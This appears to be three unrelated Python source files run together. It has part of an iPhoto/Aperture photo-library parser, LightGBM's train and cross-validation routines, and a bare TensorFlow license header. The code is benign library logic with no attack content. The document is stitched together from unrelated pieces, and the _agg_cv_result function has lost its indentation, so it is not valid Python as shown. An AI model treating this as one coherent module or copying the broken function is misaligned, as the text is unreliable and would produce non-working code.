                if self.uuid == 'lastImportAlbum':
                    albumtype = "Special Roll"
            if 'Comments' in data:
                self.comment = data.get("Comments")
        if aperture_data:
            # Prefer the note stored in the Aperture database, if any.
            container = None
            if self.uuid and self.uuid in aperture_data.folders:
                container = aperture_data.folders[self.uuid]
            elif self.uuid and self.uuid in aperture_data.albums:
                container = aperture_data.albums[self.uuid]
            if container and container.note:
                self.comment = container.note

        # The iPhoto master album has no album type.
        if not albumtype and data and "Master" in data:
            albumtype = 'Master'
        # Convert Aperture numeric album types to iPhoto album type names.
        if albumtype in _APERTURE_ALBUM_TYPES:
            albumtype = _APERTURE_ALBUM_TYPES[albumtype]
        elif not albumtype:
            if verbose:
                su.pout(u'No album type for %s.' % name)
        elif albumtype.isdigit():
            albumid = int(albumtype)
            if albumid > 90:
                # 94 - Photos
                # 95 - Flagged
                # 96 - Library Album
                # 97 - Projects
                # 98 - Aperture
                # 99 - Aperture Library
                albumtype = name
            else:
                print('Unknown album type %s for %s.' % (albumtype, name))
        self.albumtype = albumtype
        self.data = data
        self.albumid = -1
        self.images = []
        self.albums = []
        self.master = False

        hidden = 0
        if not self.isfolder() and data and (
                "KeyList" in data or "KeyListString" in data):
            keylist = data.get("KeyList") if "KeyList" in data else data.get(
                "KeyListString").split(",")
            for key in keylist:
                if not key:
                    continue
                image = images.get(key)
                if image:
                    # Skip images whose rating is filtered out.
                    if ratings and not image.rating in ratings:
                        continue
                    self.images.append(image)
                else:
                    hidden += 1
                    if verbose:
                        su.pout(u"%s: image with id %s does not exist - "
                                u"could be hidden." % (name, key))
        if hidden:
            su.pout(u"%s: %d images not exported (probably hidden)." % (
                name, hidden))
        self._assign_names()

    def _assign_names(self):
        """Assigns sequential index values to all images if this container is
        an Event."""
        if self.albumtype != 'Event':
            return
        i = 1
        index_digits = len(str(len(self.images)))
        for image in self.images:
            image.event_name = self.name
            image.event_index = i
            image.event_index0 = str(i).zfill(index_digits)
            i += 1

    def merge(self, other_roll):
        """Merges the images of another roll into this one and renumbers."""
        for image in other_roll.images:
            self.images.append(image)
        self._assign_names()

    def _getsize(self):
        return len(self.images)
    size = property(_getsize, "Gets the size (# of images) of this album.")

    def isfolder(self):
        """tests if this album is a folder."""
        return "Folder" == self.albumtype

    def getfolderhint(self):
        """Gets a suggested folder name from comments."""
        if self.comment:
            for comment in self.comment.split("\n"):
                if comment.startswith("@"):
                    return comment[1:]
        return None

    def getcommentwithouthints(self):
        """Gets the image comments, with any folder hint lines removed"""
        result = []
        if self.comment:
            for line in self.comment.split("\n"):
                if not line.startswith("@"):
                    result.append(line)
        return "\n".join(result)

    def addalbum(self, album):
        """adds an album to this container."""
        self.albums.append(album)

    def _getdate(self):
        # For containers that don't have a date, we calculate it from the
        # image dates.
        if not self._date:
            for image in self.images:
                if image.date and (not self._date or image.date < self._date):
                    self._date = image.date
        return self._date
    date = property(_getdate, doc='date of container (based on oldest image)')

    def tostring(self):
        """Gets a string that describes this album or event."""
        return "%s (%s)" % (self.name, self.albumtype)

    def print_summary(self):
        """Prints image/original counts, sizes (MB) and face count for an
        Event; does nothing for other container types."""
        if self.albumtype != "Event":
            return
        original_count = 0
        file_size = 0
        original_size = 0
        face_count = 0
        for image in self.images:
            face_count += len(image.getfaces())
            if image.originalpath:
                original_count += 1
                if os.path.exists(image.originalpath):
                    original_size += os.path.getsize(image.originalpath)
            if os.path.exists(image.image_path):
                file_size += os.path.getsize(image.image_path)
                if not image.originalpath:
                    original_size += os.path.getsize(image.image_path)
        file_size = file_size / 1024.0 / 1024.0
        original_size = original_size / 1024.0 / 1024.0
        su.pout(u"%-50s %4d images (%6.1f MB), %3d originals (%6.1f MB), "
                u"%3d faces" % (
                    self.tostring(), len(self.images), file_size,
                    original_count, original_size, face_count))
class IPhotoRoll(IPhotoContainer):
    """Describes an iPhoto Roll or Event."""

    def __init__(self, data, images, ratings, aperture_data):
        # iPhoto stores "RollName"/"RollID"; newer data uses
        # "AlbumName"/"AlbumId" - accept either.
        IPhotoContainer.__init__(self,
                                 data.get("RollName")
                                 if "RollName" in data
                                 else data.get("AlbumName"),
                                 "Event", data, images, ratings, aperture_data)
        self.albumid = data.get("RollID")
        if not self.albumid:
            self.albumid = data.get("AlbumId")
class IPhotoAlbum(IPhotoContainer):
    """Describes an iPhoto Album."""

    def __init__(self, data, images, ratings, album_map, root_album,
                 aperture_data):
        IPhotoContainer.__init__(
            self, data.get("AlbumName"),
            data.get("Album Type") if "Album Type" in data else "Regular",
            data, images, ratings, aperture_data)
        self.albumid = data.get("AlbumId")
        if "Master" in data:
            self.master = True
        parent_id = data.get("Parent")
        if parent_id is None:
            # Top-level albums hang off the root album.
            self.parent = root_album
        else:
            self.parent = album_map.get(parent_id)
            if not self.parent:
                print("Album %s: parent with id %d not found." % (
                    self.name, parent_id))
        if self.parent:
            self.parent.addalbum(self)
class IPhotoFace(object):
    """An IPhotoContainer compatible class for a face."""

    def __init__(self, face):
        self.name = face
        self.albumtype = "Face"
        self.albumid = -1
        self.images = []
        self.albums = []
        self.comment = ""
        # Starts at "now"; addimage() walks this back to the oldest image.
        self.date = datetime.datetime.now()

    def _getsize(self):
        return len(self.images)
    size = property(_getsize, "Gets the size (# of images) of this album.")

    def isfolder(self):
        """A face album is never a folder."""
        return False

    def getfolderhint(self):
        """Faces have no comments, so there is never a folder hint."""
        return None

    def getcommentwithouthints(self):
        """Faces have no comments; always returns an empty string."""
        return ""

    def addimage(self, image):
        """Adds an image to this container and updates the album date."""
        self.images.append(image)
        # Keep the album date pinned to the earliest image seen so far.
        if image.date is not None and image.date < self.date:
            self.date = image.date

    def tostring(self):
        """Gets a string that describes this album or event."""
        return "{0} ({1})".format(self.name, self.albumtype)
def get_album_xmlfile(library_dir):
    """Locates the iPhoto AlbumData.xml or Aperture ApertureData.xml file.

    Args:
        library_dir: path to the library folder.

    Returns:
        Full path to the database XML file.

    Raises:
        ValueError: if neither file exists in library_dir.
    """
    if os.path.exists(library_dir) and os.path.isdir(library_dir):
        for file_name in ("AlbumData.xml", "ApertureData.xml"):
            album_xml_file = os.path.join(library_dir, file_name)
            if os.path.exists(album_xml_file):
                return album_xml_file
    # Py2-only "raise ValueError, msg" replaced with call syntax.
    raise ValueError(("%s does not appear to be a valid iPhoto or Aperture "
                      "library location.") % (library_dir))
def get_album_sqlfile(library_dir):
    """Locates the iPhoto Library.apdb file.

    Args:
        library_dir: path to the library folder.

    Returns:
        Full path to Database/apdb/Library.apdb.

    Raises:
        ValueError: if the file does not exist in library_dir.
    """
    if os.path.exists(library_dir) and os.path.isdir(library_dir):
        album_sql_file = os.path.join(library_dir, "Database", "apdb",
                                      "Library.apdb")
        if os.path.exists(album_sql_file):
            return album_sql_file
    # Py2-only "raise ValueError, msg" replaced with call syntax.
    raise ValueError(("%s does not appear to be a valid iPhoto "
                      "library location.") % (library_dir))
def get_iphoto_data(album_xml_file, album_sql_file, ratings=None,
                    verbose=False, aperture=False):
    """reads the iPhoto database and converts it into an iPhotoData object.

    Raises:
        ValueError: if the library's application version is not supported.
    """
    library_dir = os.path.dirname(album_xml_file)
    is_aperture = aperture or album_xml_file.endswith('ApertureData.xml')
    if verbose:
        print("Reading %s database from %s..." % (
            'Aperture' if is_aperture else 'iPhoto', album_xml_file))
    album_xml = applexml.read_applexml(album_xml_file, album_sql_file)
    album_xml2 = None
    if is_aperture:
        try:
            import appledata.aperturedata as aperturedata
            aperture_data = aperturedata.get_aperture_data(library_dir,
                                                           verbose)
        except ImportError:
            # Aperture support module not available - proceed without it.
            aperture_data = None
    else:
        aperture_data = None
        # Recent iPhoto versions write event and album data into
        # iLifeShared/AlbumData2.xml.
        album_xml_file2 = os.path.join(os.path.split(album_xml_file)[0],
                                       "iLifeShared", "AlbumData2.xml")
        if os.path.exists(album_xml_file2):
            if verbose:
                su.pout("Reading event and album data from %s..." % (
                    album_xml_file2))
            album_xml2 = applexml.read_applexml(album_xml_file2, None)

    data = IPhotoData(album_xml, album_xml2, ratings, is_aperture,
                      aperture_data)
    if is_aperture:
        if (not data.applicationVersion.startswith('3.')
                and not data.applicationVersion.startswith('9.')):
            raise ValueError("Aperture version %s not supported" % (
                data.applicationVersion))
    else:
        if (not data.applicationVersion.startswith("9.") and
                not data.applicationVersion.startswith("8.") and
                not data.applicationVersion.startswith("7.") and
                not data.applicationVersion.startswith("6.")):
            raise ValueError("iPhoto version %s not supported" % (
                data.applicationVersion))
    return data
|
|
# coding: utf-8
"""Library with training routines of LightGBM."""
import collections
import copy
from operator import attrgetter
from pathlib import Path
from typing import Any, Callable, Dict, List, Optional, Tuple, Union
import numpy as np
from . import callback
from .basic import (Booster, Dataset, LightGBMError, _ArrayLike, _choose_param_value, _ConfigAliases, _InnerPredictor,
_log_warning)
from .compat import SKLEARN_INSTALLED, _LGBMGroupKFold, _LGBMStratifiedKFold
# Signature of a user-supplied objective: (preds, train_data) -> (grad, hess).
_LGBM_CustomObjectiveFunction = Callable[
    [np.ndarray, Dataset],
    Tuple[_ArrayLike, _ArrayLike]
]
# Signature of a user-supplied metric:
# (preds, eval_data) -> (eval_name, eval_result, is_higher_better).
_LGBM_CustomMetricFunction = Callable[
    [np.ndarray, Dataset],
    Tuple[str, float, bool]
]
def train(
    params: Dict[str, Any],
    train_set: Dataset,
    num_boost_round: int = 100,
    valid_sets: Optional[List[Dataset]] = None,
    valid_names: Optional[List[str]] = None,
    fobj: Optional[_LGBM_CustomObjectiveFunction] = None,
    feval: Optional[Union[_LGBM_CustomMetricFunction, List[_LGBM_CustomMetricFunction]]] = None,
    init_model: Optional[Union[str, Path, Booster]] = None,
    feature_name: Union[List[str], str] = 'auto',
    categorical_feature: Union[List[str], List[int], str] = 'auto',
    keep_training_booster: bool = False,
    callbacks: Optional[List[Callable]] = None
) -> Booster:
    """Perform the training with given parameters.
    Parameters
    ----------
    params : dict
        Parameters for training.
    train_set : Dataset
        Data to be trained on.
    num_boost_round : int, optional (default=100)
        Number of boosting iterations.
    valid_sets : list of Dataset, or None, optional (default=None)
        List of data to be evaluated on during training.
    valid_names : list of str, or None, optional (default=None)
        Names of ``valid_sets``.
    fobj : callable or None, optional (default=None)
        Customized objective function.
        Should accept two parameters: preds, train_data,
        and return (grad, hess).
            preds : numpy 1-D array
                The predicted values.
                Predicted values are returned before any transformation,
                e.g. they are raw margin instead of probability of positive class for binary task.
            train_data : Dataset
                The training dataset.
            grad : list, numpy 1-D array or pandas Series
                The value of the first order derivative (gradient) of the loss
                with respect to the elements of preds for each sample point.
            hess : list, numpy 1-D array or pandas Series
                The value of the second order derivative (Hessian) of the loss
                with respect to the elements of preds for each sample point.
        For multi-class task, the preds is group by class_id first, then group by row_id.
        If you want to get i-th row preds in j-th class, the access way is score[j * num_data + i]
        and you should group grad and hess in this way as well.
    feval : callable, list of callable, or None, optional (default=None)
        Customized evaluation function.
        Each evaluation function should accept two parameters: preds, train_data,
        and return (eval_name, eval_result, is_higher_better) or list of such tuples.
            preds : numpy 1-D array
                The predicted values.
                If ``fobj`` is specified, predicted values are returned before any transformation,
                e.g. they are raw margin instead of probability of positive class for binary task in this case.
            train_data : Dataset
                The training dataset.
            eval_name : str
                The name of evaluation function (without whitespaces).
            eval_result : float
                The eval result.
            is_higher_better : bool
                Is eval result higher better, e.g. AUC is ``is_higher_better``.
        For multi-class task, the preds is group by class_id first, then group by row_id.
        If you want to get i-th row preds in j-th class, the access way is preds[j * num_data + i].
        To ignore the default metric corresponding to the used objective,
        set the ``metric`` parameter to the string ``"None"`` in ``params``.
    init_model : str, pathlib.Path, Booster or None, optional (default=None)
        Filename of LightGBM model or Booster instance used for continue training.
    feature_name : list of str, or 'auto', optional (default="auto")
        Feature names.
        If 'auto' and data is pandas DataFrame, data columns names are used.
    categorical_feature : list of str or int, or 'auto', optional (default="auto")
        Categorical features.
        If list of int, interpreted as indices.
        If list of str, interpreted as feature names (need to specify ``feature_name`` as well).
        If 'auto' and data is pandas DataFrame, pandas unordered categorical columns are used.
        All values in categorical features should be less than int32 max value (2147483647).
        Large values could be memory consuming. Consider using consecutive integers starting from zero.
        All negative values in categorical features will be treated as missing values.
        The output cannot be monotonically constrained with respect to a categorical feature.
    keep_training_booster : bool, optional (default=False)
        Whether the returned Booster will be used to keep training.
        If False, the returned value will be converted into _InnerPredictor before returning.
        This means you won't be able to use ``eval``, ``eval_train`` or ``eval_valid`` methods of the returned Booster.
        When your model is very large and cause the memory error,
        you can try to set this param to ``True`` to avoid the model conversion performed during the internal call of ``model_to_string``.
        You can still use _InnerPredictor as ``init_model`` for future continue training.
    callbacks : list of callable, or None, optional (default=None)
        List of callback functions that are applied at each iteration.
        See Callbacks in Python API for more information.
    Returns
    -------
    booster : Booster
        The trained Booster model.
    """
    # create predictor first
    params = copy.deepcopy(params)
    if fobj is not None:
        # A custom objective supersedes any objective given via params.
        for obj_alias in _ConfigAliases.get("objective"):
            params.pop(obj_alias, None)
        params['objective'] = 'none'
    # Any num_iterations alias found in params overrides the argument.
    for alias in _ConfigAliases.get("num_iterations"):
        if alias in params:
            num_boost_round = params.pop(alias)
            _log_warning(f"Found `{alias}` in params. Will use it instead of argument")
    params["num_iterations"] = num_boost_round
    # setting early stopping via global params should be possible
    params = _choose_param_value(
        main_param_name="early_stopping_round",
        params=params,
        default_value=None
    )
    if params["early_stopping_round"] is None:
        params.pop("early_stopping_round")
    first_metric_only = params.get('first_metric_only', False)
    if num_boost_round <= 0:
        raise ValueError("num_boost_round should be greater than zero.")
    predictor: Optional[_InnerPredictor] = None
    if isinstance(init_model, (str, Path)):
        predictor = _InnerPredictor(model_file=init_model, pred_parameter=params)
    elif isinstance(init_model, Booster):
        predictor = init_model._to_predictor(dict(init_model.params, **params))
    init_iteration = predictor.num_total_iteration if predictor is not None else 0
    # check dataset
    if not isinstance(train_set, Dataset):
        raise TypeError("Training only accepts Dataset object")
    train_set._update_params(params) \
        ._set_predictor(predictor) \
        .set_feature_name(feature_name) \
        .set_categorical_feature(categorical_feature)
    is_valid_contain_train = False
    train_data_name = "training"
    reduced_valid_sets = []
    name_valid_sets = []
    if valid_sets is not None:
        if isinstance(valid_sets, Dataset):
            valid_sets = [valid_sets]
        if isinstance(valid_names, str):
            valid_names = [valid_names]
        for i, valid_data in enumerate(valid_sets):
            # reduce cost for prediction training data
            if valid_data is train_set:
                is_valid_contain_train = True
                if valid_names is not None:
                    train_data_name = valid_names[i]
                continue
            if not isinstance(valid_data, Dataset):
                raise TypeError("Training only accepts Dataset object")
            reduced_valid_sets.append(valid_data._update_params(params).set_reference(train_set))
            if valid_names is not None and len(valid_names) > i:
                name_valid_sets.append(valid_names[i])
            else:
                name_valid_sets.append(f'valid_{i}')
    # process callbacks
    if callbacks is None:
        callbacks_set = set()
    else:
        # Preserve user callback ordering via a negative 'order' attribute.
        for i, cb in enumerate(callbacks):
            cb.__dict__.setdefault('order', i - len(callbacks))
        callbacks_set = set(callbacks)
    if "early_stopping_round" in params:
        callbacks_set.add(
            callback.early_stopping(
                stopping_rounds=params["early_stopping_round"],
                first_metric_only=first_metric_only,
                verbose=_choose_param_value(
                    main_param_name="verbosity",
                    params=params,
                    default_value=1
                ).pop("verbosity") > 0
            )
        )
    callbacks_before_iter_set = {cb for cb in callbacks_set if getattr(cb, 'before_iteration', False)}
    callbacks_after_iter_set = callbacks_set - callbacks_before_iter_set
    callbacks_before_iter = sorted(callbacks_before_iter_set, key=attrgetter('order'))
    callbacks_after_iter = sorted(callbacks_after_iter_set, key=attrgetter('order'))
    # construct booster
    try:
        booster = Booster(params=params, train_set=train_set)
        if is_valid_contain_train:
            booster.set_train_data_name(train_data_name)
        for valid_set, name_valid_set in zip(reduced_valid_sets, name_valid_sets):
            booster.add_valid(valid_set, name_valid_set)
    finally:
        # Always undo the parameter updates applied to the datasets above.
        train_set._reverse_update_params()
        for valid_set in reduced_valid_sets:
            valid_set._reverse_update_params()
    booster.best_iteration = 0
    # start training
    for i in range(init_iteration, init_iteration + num_boost_round):
        for cb in callbacks_before_iter:
            cb(callback.CallbackEnv(model=booster,
                                    params=params,
                                    iteration=i,
                                    begin_iteration=init_iteration,
                                    end_iteration=init_iteration + num_boost_round,
                                    evaluation_result_list=None))
        booster.update(fobj=fobj)
        evaluation_result_list = []
        # check evaluation result.
        if valid_sets is not None:
            if is_valid_contain_train:
                evaluation_result_list.extend(booster.eval_train(feval))
            evaluation_result_list.extend(booster.eval_valid(feval))
        try:
            for cb in callbacks_after_iter:
                cb(callback.CallbackEnv(model=booster,
                                        params=params,
                                        iteration=i,
                                        begin_iteration=init_iteration,
                                        end_iteration=init_iteration + num_boost_round,
                                        evaluation_result_list=evaluation_result_list))
        except callback.EarlyStopException as earlyStopException:
            # Early-stopping callback signals via exception.
            booster.best_iteration = earlyStopException.best_iteration + 1
            evaluation_result_list = earlyStopException.best_score
            break
    booster.best_score = collections.defaultdict(collections.OrderedDict)
    for dataset_name, eval_name, score, _ in evaluation_result_list:
        booster.best_score[dataset_name][eval_name] = score
    if not keep_training_booster:
        # Round-trip through a model string to drop training-only state.
        booster.model_from_string(booster.model_to_string()).free_dataset()
    return booster
class CVBooster:
    """CVBooster in LightGBM.

    Auxiliary container holding the per-fold Boosters built by the ``cv``
    function. It mirrors the Booster API: any method invoked on a CVBooster
    is dispatched to every underlying Booster, and the individual results
    are collected into a list (one entry per fold).

    Attributes
    ----------
    boosters : list of Booster
        The list of underlying fitted models.
    best_iteration : int
        The best iteration of fitted model.
    """

    def __init__(self):
        """Initialize an empty CVBooster.

        Generally, no need to instantiate manually; ``cv`` builds one.
        """
        self.boosters = []
        self.best_iteration = -1

    def _append(self, booster):
        """Register one fold's Booster with this container."""
        self.boosters.append(booster)

    def __getattr__(self, name):
        """Return a dispatcher that fans the call out to every fold's Booster."""
        def _broadcast(*args, **kwargs):
            """Invoke ``name`` on each booster and gather the results in a list."""
            return [getattr(fold_booster, name)(*args, **kwargs)
                    for fold_booster in self.boosters]
        return _broadcast
def _make_n_folds(full_data, folds, nfold, params, seed, fpreproc=None, stratified=True,
                  shuffle=True, eval_train_metric=False):
    """Make an n-fold list of Boosters from random indices.

    Parameters
    ----------
    full_data : Dataset
        The full training dataset to be split into folds.
    folds : generator/iterator of (train_idx, test_idx) tuples, scikit-learn splitter or None
        Custom split specification; takes precedence over ``nfold`` /
        ``stratified`` / ``shuffle`` when not None.
    nfold : int
        Number of folds used when ``folds`` is None.
    params : dict
        Booster parameters; also inspected for a ranking objective, which
        forces a group-aware split.
    seed : int
        Seed used for shuffling when no custom ``folds`` is given.
    fpreproc : callable or None, optional (default=None)
        Preprocessing function taking (dtrain, dtest, params) and returning
        transformed versions of those.
    stratified : bool, optional (default=True)
        Whether to perform stratified sampling.
    shuffle : bool, optional (default=True)
        Whether to shuffle before splitting data.
    eval_train_metric : bool, optional (default=False)
        Whether to also register each fold's training subset for evaluation.

    Returns
    -------
    ret : CVBooster
        Container holding one Booster per fold, each with its validation
        (and optionally training) subset attached.
    """
    full_data = full_data.construct()
    num_data = full_data.num_data()
    if folds is not None:
        # User-supplied split: either an iterable of index tuples or a
        # scikit-learn splitter object exposing split().
        if not hasattr(folds, '__iter__') and not hasattr(folds, 'split'):
            raise AttributeError("folds should be a generator or iterator of (train_idx, test_idx) tuples "
                                 "or scikit-learn splitter object with split method")
        if hasattr(folds, 'split'):
            group_info = full_data.get_group()
            if group_info is not None:
                # np.asarray keeps the no-copy fast path but, unlike
                # np.array(..., copy=False), does not raise on NumPy 2.0
                # when a dtype conversion forces a copy.
                group_info = np.asarray(group_info, dtype=np.int32)
                flatted_group = np.repeat(range(len(group_info)), repeats=group_info)
            else:
                flatted_group = np.zeros(num_data, dtype=np.int32)
            folds = folds.split(X=np.empty(num_data), y=full_data.get_label(), groups=flatted_group)
    else:
        if any(params.get(obj_alias, "") in {"lambdarank", "rank_xendcg", "xendcg",
                                             "xe_ndcg", "xe_ndcg_mart", "xendcg_mart"}
               for obj_alias in _ConfigAliases.get("objective")):
            if not SKLEARN_INSTALLED:
                raise LightGBMError('scikit-learn is required for ranking cv')
            # ranking task, split according to groups
            group_info = np.asarray(full_data.get_group(), dtype=np.int32)
            flatted_group = np.repeat(range(len(group_info)), repeats=group_info)
            group_kfold = _LGBMGroupKFold(n_splits=nfold)
            folds = group_kfold.split(X=np.empty(num_data), groups=flatted_group)
        elif stratified:
            if not SKLEARN_INSTALLED:
                raise LightGBMError('scikit-learn is required for stratified cv')
            skf = _LGBMStratifiedKFold(n_splits=nfold, shuffle=shuffle, random_state=seed)
            folds = skf.split(X=np.empty(num_data), y=full_data.get_label())
        else:
            # Plain (optionally shuffled) contiguous split into nfold chunks.
            if shuffle:
                randidx = np.random.RandomState(seed).permutation(num_data)
            else:
                randidx = np.arange(num_data)
            kstep = int(num_data / nfold)
            test_id = [randidx[i: i + kstep] for i in range(0, num_data, kstep)]
            train_id = [np.concatenate([test_id[i] for i in range(nfold) if k != i]) for k in range(nfold)]
            folds = zip(train_id, test_id)
    ret = CVBooster()
    for train_idx, test_idx in folds:
        train_set = full_data.subset(sorted(train_idx))
        valid_set = full_data.subset(sorted(test_idx))
        # run preprocessing on the data set if needed
        if fpreproc is not None:
            train_set, valid_set, tparam = fpreproc(train_set, valid_set, params.copy())
        else:
            tparam = params
        cvbooster = Booster(tparam, train_set)
        if eval_train_metric:
            cvbooster.add_valid(train_set, 'train')
        cvbooster.add_valid(valid_set, 'valid')
        ret._append(cvbooster)
    return ret
def _agg_cv_result(raw_results, eval_train_metric=False):
"""Aggregate cross-validation results."""
cvmap = collections.OrderedDict()
metric_type = {}
for one_result in raw_results:
for one_line in one_result:
if eval_train_metric:
key = f"{one_line[0]} {one_line[1]}"
else:
key = one_line[1]
metric_type[key] = one_line[3]
cvmap.setdefault(key, [])
cvmap[key].append(one_line[2])
return [('cv_agg', k, np.mean(v), metric_type[k], np.std(v)) for k, v in cvmap.items()]
def cv(params, train_set, num_boost_round=100,
       folds=None, nfold=5, stratified=True, shuffle=True,
       metrics=None, fobj=None, feval=None, init_model=None,
       feature_name='auto', categorical_feature='auto',
       fpreproc=None, seed=0, callbacks=None, eval_train_metric=False,
       return_cvbooster=False):
    """Perform the cross-validation with given parameters.

    Parameters
    ----------
    params : dict
        Parameters for Booster.
    train_set : Dataset
        Data to be trained on.
    num_boost_round : int, optional (default=100)
        Number of boosting iterations.
    folds : generator or iterator of (train_idx, test_idx) tuples, scikit-learn splitter object or None, optional (default=None)
        If generator or iterator, it should yield the train and test indices for each fold.
        If object, it should be one of the scikit-learn splitter classes
        (https://scikit-learn.org/stable/modules/classes.html#splitter-classes)
        and have ``split`` method.
        This argument has highest priority over other data split arguments.
    nfold : int, optional (default=5)
        Number of folds in CV.
    stratified : bool, optional (default=True)
        Whether to perform stratified sampling.
    shuffle : bool, optional (default=True)
        Whether to shuffle before splitting data.
    metrics : str, list of str, or None, optional (default=None)
        Evaluation metrics to be monitored while CV.
        If not None, the metric in ``params`` will be overridden.
    fobj : callable or None, optional (default=None)
        Customized objective function.
        Should accept two parameters: preds, train_data,
        and return (grad, hess).

            preds : numpy 1-D array
                The predicted values.
                Predicted values are returned before any transformation,
                e.g. they are raw margin instead of probability of positive class for binary task.
            train_data : Dataset
                The training dataset.
            grad : list, numpy 1-D array or pandas Series
                The value of the first order derivative (gradient) of the loss
                with respect to the elements of preds for each sample point.
            hess : list, numpy 1-D array or pandas Series
                The value of the second order derivative (Hessian) of the loss
                with respect to the elements of preds for each sample point.

        For multi-class task, the preds is group by class_id first, then group by row_id.
        If you want to get i-th row preds in j-th class, the access way is score[j * num_data + i]
        and you should group grad and hess in this way as well.
    feval : callable, list of callable, or None, optional (default=None)
        Customized evaluation function.
        Each evaluation function should accept two parameters: preds, train_data,
        and return (eval_name, eval_result, is_higher_better) or list of such tuples.

            preds : numpy 1-D array
                The predicted values.
                If ``fobj`` is specified, predicted values are returned before any transformation,
                e.g. they are raw margin instead of probability of positive class for binary task in this case.
            train_data : Dataset
                The training dataset.
            eval_name : str
                The name of evaluation function (without whitespace).
            eval_result : float
                The eval result.
            is_higher_better : bool
                Is eval result higher better, e.g. AUC is ``is_higher_better``.

        For multi-class task, the preds is group by class_id first, then group by row_id.
        If you want to get i-th row preds in j-th class, the access way is preds[j * num_data + i].
        To ignore the default metric corresponding to the used objective,
        set ``metrics`` to the string ``"None"``.
    init_model : str, pathlib.Path, Booster or None, optional (default=None)
        Filename of LightGBM model or Booster instance used for continue training.
    feature_name : list of str, or 'auto', optional (default="auto")
        Feature names.
        If 'auto' and data is pandas DataFrame, data columns names are used.
    categorical_feature : list of str or int, or 'auto', optional (default="auto")
        Categorical features.
        If list of int, interpreted as indices.
        If list of str, interpreted as feature names (need to specify ``feature_name`` as well).
        If 'auto' and data is pandas DataFrame, pandas unordered categorical columns are used.
        All values in categorical features should be less than int32 max value (2147483647).
        Large values could be memory consuming. Consider using consecutive integers starting from zero.
        All negative values in categorical features will be treated as missing values.
        The output cannot be monotonically constrained with respect to a categorical feature.
    fpreproc : callable or None, optional (default=None)
        Preprocessing function that takes (dtrain, dtest, params)
        and returns transformed versions of those.
    seed : int, optional (default=0)
        Seed used to generate the folds (passed to numpy.random.seed).
    callbacks : list of callable, or None, optional (default=None)
        List of callback functions that are applied at each iteration.
        See Callbacks in Python API for more information.
    eval_train_metric : bool, optional (default=False)
        Whether to display the train metric in progress.
        The score of the metric is calculated again after each training step, so there is some impact on performance.
    return_cvbooster : bool, optional (default=False)
        Whether to return Booster models trained on each fold through ``CVBooster``.

    Returns
    -------
    eval_hist : dict
        Evaluation history.
        The dictionary has the following format:
        {'metric1-mean': [values], 'metric1-stdv': [values],
        'metric2-mean': [values], 'metric2-stdv': [values],
        ...}.
        If ``return_cvbooster=True``, also returns trained boosters via ``cvbooster`` key.
    """
    if not isinstance(train_set, Dataset):
        raise TypeError("Training only accepts Dataset object")
    # Deep-copy so alias popping / overrides below never mutate the caller's dict.
    params = copy.deepcopy(params)
    if fobj is not None:
        # A custom objective supersedes any built-in objective in params.
        for obj_alias in _ConfigAliases.get("objective"):
            params.pop(obj_alias, None)
        params['objective'] = 'none'
    # Any num_iterations alias in params wins over the num_boost_round argument
    # (last alias found wins if several are present).
    for alias in _ConfigAliases.get("num_iterations"):
        if alias in params:
            _log_warning(f"Found '{alias}' in params. Will use it instead of 'num_boost_round' argument")
            num_boost_round = params.pop(alias)
    params["num_iterations"] = num_boost_round
    # setting early stopping via global params should be possible
    params = _choose_param_value(
        main_param_name="early_stopping_round",
        params=params,
        default_value=None
    )
    if params["early_stopping_round"] is None:
        params.pop("early_stopping_round")
    first_metric_only = params.get('first_metric_only', False)
    if num_boost_round <= 0:
        raise ValueError("num_boost_round should be greater than zero.")
    if isinstance(init_model, (str, Path)):
        predictor = _InnerPredictor(model_file=init_model, pred_parameter=params)
    elif isinstance(init_model, Booster):
        predictor = init_model._to_predictor(dict(init_model.params, **params))
    else:
        predictor = None
    if metrics is not None:
        # Explicit metrics argument overrides every metric alias in params.
        for metric_alias in _ConfigAliases.get("metric"):
            params.pop(metric_alias, None)
        params['metric'] = metrics
    train_set._update_params(params) \
        ._set_predictor(predictor) \
        .set_feature_name(feature_name) \
        .set_categorical_feature(categorical_feature)
    results = collections.defaultdict(list)
    cvfolds = _make_n_folds(train_set, folds=folds, nfold=nfold,
                            params=params, seed=seed, fpreproc=fpreproc,
                            stratified=stratified, shuffle=shuffle,
                            eval_train_metric=eval_train_metric)
    # setup callbacks
    if callbacks is None:
        callbacks = set()
    else:
        # Negative default order keeps user callbacks before internal ones.
        for i, cb in enumerate(callbacks):
            cb.__dict__.setdefault('order', i - len(callbacks))
        callbacks = set(callbacks)
    if "early_stopping_round" in params:
        callbacks.add(
            callback.early_stopping(
                stopping_rounds=params["early_stopping_round"],
                first_metric_only=first_metric_only,
                verbose=_choose_param_value(
                    main_param_name="verbosity",
                    params=params,
                    default_value=1
                ).pop("verbosity") > 0
            )
        )
    # Split callbacks by phase and run each phase in 'order'.
    callbacks_before_iter = {cb for cb in callbacks if getattr(cb, 'before_iteration', False)}
    callbacks_after_iter = callbacks - callbacks_before_iter
    callbacks_before_iter = sorted(callbacks_before_iter, key=attrgetter('order'))
    callbacks_after_iter = sorted(callbacks_after_iter, key=attrgetter('order'))
    for i in range(num_boost_round):
        for cb in callbacks_before_iter:
            cb(callback.CallbackEnv(model=cvfolds,
                                    params=params,
                                    iteration=i,
                                    begin_iteration=0,
                                    end_iteration=num_boost_round,
                                    evaluation_result_list=None))
        # One boosting step on every fold, then aggregate fold metrics.
        cvfolds.update(fobj=fobj)
        res = _agg_cv_result(cvfolds.eval_valid(feval), eval_train_metric)
        for _, key, mean, _, std in res:
            results[f'{key}-mean'].append(mean)
            results[f'{key}-stdv'].append(std)
        try:
            for cb in callbacks_after_iter:
                cb(callback.CallbackEnv(model=cvfolds,
                                        params=params,
                                        iteration=i,
                                        begin_iteration=0,
                                        end_iteration=num_boost_round,
                                        evaluation_result_list=res))
        except callback.EarlyStopException as earlyStopException:
            # Trim history to the best iteration reported by early stopping.
            cvfolds.best_iteration = earlyStopException.best_iteration + 1
            for k in results:
                results[k] = results[k][:cvfolds.best_iteration]
            break
    if return_cvbooster:
        results['cvbooster'] = cvfolds
    return dict(results)
|
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
